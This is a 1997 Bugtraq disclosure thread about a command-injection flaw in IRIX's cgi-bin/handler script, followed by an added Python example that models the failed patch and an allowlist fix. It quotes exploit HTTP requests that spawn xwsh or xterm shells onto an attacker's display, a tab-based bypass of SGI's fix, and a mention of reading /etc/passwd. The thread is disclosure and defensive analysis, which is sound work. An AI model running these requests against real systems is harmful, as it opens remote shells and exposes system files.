[5011] in bugtraq
Re: CPSR 7: IRIX WWW Server
daemon@ATHENA.MIT.EDU (Lamont Granquist)
Thu Jul 24 19:17:19 1997
Date: Thu, 24 Jul 1997 14:15:20 -0700
Reply-To: Lamont Granquist <lamontg@hitl.washington.edu>
From: Lamont Granquist <lamontg@HITL.WASHINGTON.EDU>
X-To: Thomas Walter <balu@STUDST.FH-MUENSTER.DE>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <33D77A1C.1C41@studst.fh-muenster.de>
On Thu, 24 Jul 1997, Thomas Walter wrote:
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
> /bin/csh|?data=Download
> UX:sh (sh): ERROR: Connection closed by foreign host.
> enemy%
s/xwsh/xterm/ and this works the same.
To reiterate Razvan's follow-up to the original posting on the
cgi-bin/handler issue, in Irix 6.3 (O2s) they attempted to fix this with
the line:
# trim off trailing pipes
$doc =~ s/\|*$// ;
which can be fooled by appending a <tab> char after the pipe, thus:
GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>
/bin/sh|<tab>?data=Download
       ^^^^^^
(one line, emphasis under the necessary change)
which can be applied to the xwsh, or cat /etc/passwd attacks or whatever.
This is not matched by the pattern s/\|*$//, but the appended tab does
not change the behavior of perl's open(yadda, "yadda|") statement since
whitespace following the '|' is ignored.
Yuri's post to Bugtraq of Fri, 16 May 1997 #2551 at
http://www.netspace.org/lsv-archive/bugtraq.html is a good read for more
info on why SGI's /var/www/cgi-bin directory should be nuked with extreme
prejudice...
--
Lamont Granquist <lamontg@hitl.washington.edu> (206)616-1469 fax:(206)543-5380
Human Interface Technology Lab. University of Washington. Seattle, WA
PGP pubkey: finger lamontg@near.hitl.washington.edu
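The failure of the quoted s/\|*$// fix and an allowlist check a defender could use instead, as an added Python example (not code from the post or from SGI's handler script): weak_trim is the quoted fix, perl_two_arg_open_mode is an assumed model of how Perl's two-argument open classifies a name by its last non-whitespace character, and hardened_check is an assumed replacement; the sample names are constructed.

```python
import re

# Constructed sample document names (not from the post); in the real
# script the name came from the ?data= query string.
SAMPLE_NAMES = ["docs/report.txt", "docs/report.txt|",
                "docs/report.txt|\t", "../etc/passwd"]


def weak_trim(doc: str) -> str:
    """The Irix 6.3 fix as quoted in the post: strip trailing '|' only.
    A pipe followed by whitespace is no longer at end-of-string, so it survives."""
    return re.sub(r"\|*$", "", doc)


def perl_two_arg_open_mode(name: str) -> str:
    """Assumed model of Perl's two-argument open(FH, $name): trailing
    whitespace is ignored, and a name whose last non-blank character is
    '|' is treated as a command to run rather than a file to read."""
    stripped = name.rstrip(" \t\r\n")
    if stripped.endswith("|"):
        return "pipe-from-command"
    if stripped.lstrip(" \t").startswith("|"):
        return "pipe-to-command"
    return "file"


# Assumed allowlist: a name may contain only these characters, so neither
# '|' nor whitespace nor any other metacharacter can reach open().
_SAFE_DOC = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_./-]*")


def hardened_check(doc: str) -> bool:
    """Accept only allowlisted characters and refuse '..' path segments."""
    if _SAFE_DOC.fullmatch(doc) is None:
        return False
    return ".." not in doc.split("/")


def audit(names):
    """For each name: how Perl would treat it after the weak fix, and whether
    the allowlist would have accepted it at all."""
    return {
        n: {
            "after_weak_trim": perl_two_arg_open_mode(weak_trim(n)),
            "hardened_accepts": hardened_check(n),
        }
        for n in names
    }


if __name__ == "__main__":
    for name, result in audit(SAMPLE_NAMES).items():
        print(repr(name), result)
```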